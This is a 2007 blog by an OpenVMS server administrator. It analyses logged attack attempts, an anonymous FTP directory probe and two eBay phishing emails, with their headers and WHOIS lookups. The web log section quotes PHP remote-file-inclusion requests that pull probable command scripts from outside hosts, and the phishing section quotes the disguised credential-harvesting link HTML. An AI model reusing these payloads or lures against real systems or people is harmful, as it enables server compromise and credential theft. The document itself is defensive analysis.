Posted on

Web server log examined

Since 22-Sep-2007, there have been attempts to get to Yahoo.com in the Uk – via this server:

"GET http://uk.yahoo.com/ HTTP/1.1"

The amount increases, of all rejected requests this is now the most common one. All “403” of course.
The number of W00tW00t requests increases as well, but all on HTTP/1.1 – and ewach fails with error 400. Have to findf out why, because the HTTP/1.0 succeeds.

And there are quite a lot of requests to cgi-bin/query. Stupid ones, but trying to bypass something?

Building Micrsoft stuff won’t work, dudes:

GET /cgi-bin/query/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0 HTTP/1.1
GET /MSOffice/cltreq.asp HTTP/1.1
GET /cgi-bin/query/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0 HTTP/1.1

And trying to bypass securtity and monitoring using the server won’t work either:
GET /cgi-bin/query/openVMS/HOW_TO/CommunigatePro/oneadmin/config.php?path[docroot]=http://www.coverbands.info/images/echo.txt? HTTP/1.1
GET /cgi-bin/query/oneadmin/config.php?path[docroot]=http://www.coverbands.info/images/echo.txt? HTTP/1.1
GET /cgi-bin/query/oneadmin/config.php?path[docroot]=http://www.coverbands.info/images/echo.txt? HTTP/1.1
...
GET /cgi-bin/query/openVMS/HOW_TO/PHP/root.php?target=http://asantecaravans.co.za/content/rss1/cmd.txt? HTTP/1.1
GET /cgi-bin/query/root.php?target=http://asantecaravans.co.za/content/rss1/cmd.txt? HTTP/1.1
GET /cgi-bin/query/root.php?target=http://asantecaravans.co.za/content/rss1/cmd.txt? HTTP/1.1

I didn’t look into echo.txt and cmd.txt, but these are likely scripts.

Posted on

FTP: I’ve seen it all before

It has been some time ago that I have seen this, but it’s all too familiar:

%%%%%%%%%%% OPCOM 3-OCT-2007 08:58:52.20 %%%%%%%%%%%
Message from user TCPIP$FTP on DIANA
User Name: anonymous
Source: 41.22-244-81.adsl-dyn.isp.belgacom.be
Status: NOPRIV -- File access violation
Object: WEB_DISK2:[public.anonymous.071003094018p]

It is another script: this time it starts with the attempt to create a directory – signalled in OPERATOR.LOG – where the directory is read-only:

%TCPIP-I-FTP_SESCON, FTP SERVER: session connection from 41.22-244-81.adsl-dyn.isp.belgacom.be at 3-OCT-2007 08:58:51.62
%TCPIP-I-FTP_NODE, client host name: 41.22-244-81.adsl-dyn.isp.belgacom.be
%TCPIP-I-FTP_USER, user name: anonymous
%TCPIP-I-FTP_OBJ, object: WEB_DISK2:[public.anonymous.071003094018p]
%TCPIP-I-FTP_CHINFO, TCPIP$FTPC0001A: Failed to create directory
%SYSTEM-F-NOPRIV, insufficient privilege or object protection violation
%TCPIP-I-FTP_NODE, client host name: 41.22-244-81.adsl-dyn.isp.belgacom.be

Accessing directories simply doesn’t work. Mainly, because I didn’t setthings up as a Windows (or Linux) box:

%TCPIP-I-FTP_OBJ, object: /pub/
%TCPIP-I-FTP_OBJ, object: /public/
%TCPIP-I-FTP_OBJ, object: /_vti_pvt/
%TCPIP-I-FTP_OBJ, object: /_vti_txt/
%TCPIP-I-FTP_OBJ, object: /_vti_cfg/
%TCPIP-I-FTP_OBJ, object: /_vti_log/
%TCPIP-I-FTP_OBJ, object: /_vti_cnf/
%TCPIP-I-FTP_OBJ, object: /_private/
%TCPIP-I-FTP_OBJ, object: /incoming/
%TCPIP-I-FTP_OBJ, object: /pub/incoming/
%TCPIP-I-FTP_OBJ, object: /public/incoming/
%TCPIP-I-FTP_OBJ, object: /public_html/
%TCPIP-I-FTP_OBJ, object: /upload/
%TCPIP-I-FTP_OBJ, object: /wwwroot/
%TCPIP-I-FTP_OBJ, object: /mailroot/
%TCPIP-I-FTP_OBJ, object: /ftproot/
%TCPIP-I-FTP_OBJ, object: /home/
%TCPIP-I-FTP_OBJ, object: /images/
%TCPIP-I-FTP_OBJ, object: /web/
%TCPIP-I-FTP_OBJ, object: /www/
%TCPIP-I-FTP_OBJ, object: /html/
%TCPIP-I-FTP_OBJ, object: /cgi-bin/
%TCPIP-I-FTP_OBJ, object: /usr/
%TCPIP-I-FTP_OBJ, object: /usr/incoming/
%TCPIP-I-FTP_OBJ, object: /temp/
%TCPIP-I-FTP_OBJ, object: /~temp/
%TCPIP-I-FTP_OBJ, object: /tmp/
%TCPIP-I-FTP_OBJ, object: /~tmp/
%TCPIP-I-FTP_OBJ, object: /outgoing/
%TCPIP-I-FTP_OBJ, object: /anonymous/
%TCPIP-I-FTP_OBJ, object: /anonymous/_vti_pvt/
%TCPIP-I-FTP_OBJ, object: /anonymous/_vti_cnf/
%TCPIP-I-FTP_OBJ, object: /anonymous/incoming/
%TCPIP-I-FTP_OBJ, object: /anonymous/pub/
%TCPIP-I-FTP_OBJ, object: /anonymous/public/

all fail with:

%TCPIP-I-FTP_CHINFO, TCPIP$FTPC0001A: Failed to set default directory
%SYSTEM-W-BADIRECTORY, bad directory file format
%TCPIP-I-FTP_USER, user name: anonymous

It all took just over 2 seconds:

%TCPIP-I-FTP_SESDCN, FTP SERVER: session disconnection from 41.22-244-81.adsl-dyn.isp.belgacom.be at 3-OCT-2007 08:58:53.47

Would belgacom.be be able to track the kid?

UPDATE
They did. Not that they can do a lot, but at least they replied.

UPDATE 2
And they stated they will take action to prevent this happening again.
They have send a responding message telling what action is taken upon the abuse-signal: They will track the person down, monitor his behaviour and remove the account on next abuse. I would even have accepted “We won’t do anyting because … “. Perfect! A lot of companies can take Belgacom as an example of how to react properly.

Posted on

More E[B/d]ay to come

At least according Hoff on his blog (read here). One good reason to have all incoming traffic run over the OpenVMS box (small chance that will be infected!), and being able to screen messages before actually donwloading them onto Windows boxes. (I would like to have apple systems around but having game-playing kids around, I’m stuck to Windows. And the company I work at – and their customers – heavily rely on Windows boxes for their office work…)

There is a fair chance that this type of scam is now filtered – even better!

Posted on

Ebay kit?

This might be correct:

kit message

The header looks quite honest as well:

Return-Path: sellers.tools@getfreenow.com
Received: from host75-97.pool217169.interbusiness.it (217.169.97.75)
by diana.intra.grootersnet.nl (V5.6-9, OpenVMS V8.3 Alpha);
Sat, 1 Sep 2007 12:44:47 +0100 (CET)
Received: from User ([70.91.163.25])
by mail.publiposter.it (Merak 7.4.2) with ASMTP id BJV74577;
Sat, 01 Sep 2007 12:44:42 +0200
Reply-To: <no.reply@eBay.com>
From: "eBay"<sellers.tools@getFREEnow.com>
Subject: Your eBay Success Kit has arrived
Date: Sat, 1 Sep 2007 05:45:17 -0500
MIME-Version: 1.0
Content-Type: text/plain;
charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

but without a TO: line, and a reply-to address at ebay, makes it suspicious. As well as the user address: 70.91.163.25. This is located in the USA:

Comcast Business Communications, Inc. CBC-CM-3 (NET-70-88-0-0-1)
70.88.0.0 - 70.91.255.255
Comcast Business Communications, Inc. CBC-LITTLEROCK-4 (NET-70-91-163-0-1)
70.91.163.0 - 70.91.163.255

# ARIN WHOIS database, last updated 2007-09-01 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

The receiving server (mail.publiposter.it) could be geniune:

Domain: publiposter.it
Status: ACTIVE
Created: 2002-06-14 00:00:00
Last Update: 2007-06-30 00:04:10
Expire Date: 2008-06-14

Registrant
Name: Publiposter & Multimedia s.p.a.
ContactID: PUBL355-ITNIC
Address: Publiposter & Multimedia s.p.a.
Isola Delle Femmine
90040
PA
IT
Created: 2007-03-01 10:39:36
Last Update: 2007-03-01 10:39:36

Admin Contact
Name: Alessio Alessi
ContactID: AA1731-ITNIC
Address: Publiposter & Multimedia s.p.a.
Isola Delle Femmine
90040
PA
IT
Created: 2002-06-14 00:00:00
Last Update: 2007-03-01 07:39:08

Technical Contacts
Name: Centro Gestione Village
ContactID: CGV35-ITNIC
Organization: Telecom Italia Spa
Address: Telecom Italia Spa
Via Pontina, km. 29,100
Roma
00040
RM
IT
Created: 2007-03-01 10:25:57
Last Update: 2007-03-06 14:04:12

Registrar
Organization: Telecom Italia s.p.a.
Name: INTERBUSINESS-MNT

Nameservers
dns6.interbusiness.it
dns3.nic.it

and interbusiness.it – also Italian – as well:

inetnum: 217.169.97.64 - 217.169.97.95
netname: IDC-DIALUP-POM-BLCK3
descr: IDC - Telecom Italia - network used in dialup access - Pomezia
country: it
admin-c: ITR2-RIPE
tech-c: ITR2-RIPE
status: assigned PA
mnt-by: FULCOM-MNT-RIPE
source: RIPE # Filtered

role: IT Telecom Role
address: Telecom Italia S.p.A.
address: Via Oriolo Romano, 257
address: Italy
phone: +390665679934(3)
fax-no: +390636870532
e-mail: ripe-noc@telecomitalia.it
remarks: trouble: ripe-noc@telecomitalia.it
admin-c: ITR2-RIPE
tech-c: ITR2-RIPE
nic-hdl: ITR2-RIPE
remarks: ##############################################
remarks: Pay attention
remarks: Any communication sent to email different
remarks: from the following will be ignored !
remarks: ##############################################
remarks: Any abuse and spamming reports, please
remarks: send them to abuse-ripe@telecomitalia.it
remarks: ##############################################
mnt-by: FULCOM-MNT-RIPE
source: RIPE # Filtered

Used in dial-up access – you can tell by the full address as well.

The domain: interbusiness.it is valid also:

Domain: interbusiness.it
Status: ACTIVE
Created: 1996-01-29 00:00:00
Last Update: 2007-01-30 00:36:13
Expire Date: 2008-01-29

Registrant
Name: Telecom Italia S.p.A.
ContactID: TELE616-ITNIC
Address: Via Paolo Di Dono, 44
Roma
00143
RM
IT
Created: 2007-03-01 10:44:12
Last Update: 2007-03-01 10:44:12

Admin Contact
Name: Camillo Di Vincenzo
ContactID: CD2-ITNIC
Address: Telecom Italia S.P.A.
Via Paolo Di Dono, 44
Roma
00143
RM
IT
Created: 2000-11-15 00:00:00
Last Update: 2007-03-01 07:49:08

Technical Contacts
Name: Domain Registration Staff
ContactID: DRS9-ITNIC
Address: Telecom Italia S.p.A.
Via Campania 11
Taranto
74100
TA
IT
Created: 2005-07-19 00:00:00
Last Update: 2007-08-08 10:51:21

Name: Gian Luca Mattu
ContactID: GLM2-ITNIC
Address: Telecom Italia SpA
Via Oriolo Romano, 240
Roma
00189
RM
IT
Created: 2005-03-09 00:00:00
Last Update: 2007-03-01 07:37:44

Name: Fabio Ginocchi
ContactID: FG82-ITNIC
Address: Telecom Italia
Via Oriolo Romano, 257
IT
Created: 2000-11-02 00:00:00
Last Update: 2007-03-01 07:38:47

Registrar
Organization: Telecom Italia s.p.a.
Name: INTERBUSINESS-MNT

Nameservers
dnsti.interbusiness.it
dns.opb.interbusiness.it
dns3.nic.it
dnsts.interbusiness.it

and makes sense because this domain is mentioned earlier – it’s name server is used.

The link in te mesage however, leads to Russia – it looks like a valid page but the contents are Russian, contains a huge amount of redirects on CGI, and the link to get an English page returns”a 404-message: Document not found.

This stinks!

Posted on

Ebay – a bit altered

This message arived today – form an Ebay – I mean, Eday member:

eday

With Outlook, Eday is easily read as Ebay…

Fake of course, sent to obtain credentials.
The header shows it’s origin: Australia – given the names, I’d say Melbourne:

Return-Path: member@eday.com
Received: from mail.southern-ro.com.au (203.46.24.242)
by xxxxxxxx.grootersnet.nl (V5.6-9, OpenVMS V8.3 Alpha);
Thu, 30 Aug 2007 13:40:27 +0100 (CET)
Received: from User ([195.84.14.70]) by melbserver.southern-ro.com.au with Microsoft SMTPSVC(6.0.3790.3959);
Thu, 30 Aug 2007 21:40:16 +1000
Reply-To: <member@eday.com>
From: "member"<member@eday.com>
Subject: message from member
Date: Thu, 30 Aug 2007 13:40:15 +0200
MIME-Version: 1.0
Content-Type: text/html;
charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Bcc:
Return-Path: member@eday.com
Message-ID: <MELBSERVERAtC33BcZY00000e29@melbserver.southern-ro.com.au>
X-OriginalArrivalTime: 30 Aug 2007 11:40:16.0643 (UTC) FILETIME=[891CAD30:01C7EAFA]
that is: from address 195.84.14.70, and this is NOT an Ebay address, nor is the mailserver that connected (203.46.24.242). Nor would Ebay use Outlook Express. In other words: it is a basic PC. no TO: line either, I wonder how the message got here in the first place.
No name in the message – which is not like ebay would do it.

Almost all links that could require a login, refer to a site at oberleitner.biz. Even the ones wheer you could signal or learn about abuse:

Always remember to complete your transactions on eBay - it's the safer way to trade.</B><BR><BR>Is
this message an offer to buy your item directly through email without
winning the item on eBay? If so, please help make the eBay marketplace
safer by reporting it to us. These external transactions may be unsafe
and are against eBay policy. <A href="http://www.oberleitner.biz/cache/ws/eBay_com_Verify_your_eBay_account_files/" target=_blank><FONT color=#003399>Learn more about trading safely</FONT></A>

A bit more down:

<B>Always remember to complete your transactions on eBay - it's the safer way to trade.</B><BR><BR>Is this message an offer to buy your item directly through email without winning the item on eBay? If so, please help make the eBay marketplace
safer by reporting it to us. These external transactions may be unsafe and are against eBay policy. <A href="http://www.oberleitner.biz/cache/ws/eBay_com_Verify_your_eBay_account_files/"
target=_blank><FONT color=#003399>Learn more about trading safely</FONT></A>

and

Learn how you can protect yourself from spoof (fake) emails at:<BR><A href="http://www.oberleitner.biz/cache/ws/eBay_com_Verify_your_eBay_account_files/" target=_blank><FONT
color=#003399>https://pages.ebay.com/education/spooftutorial</FONT></A>

It looks like Oberleitner.biz’s business is getting user credentials. Or it’s domain is abused.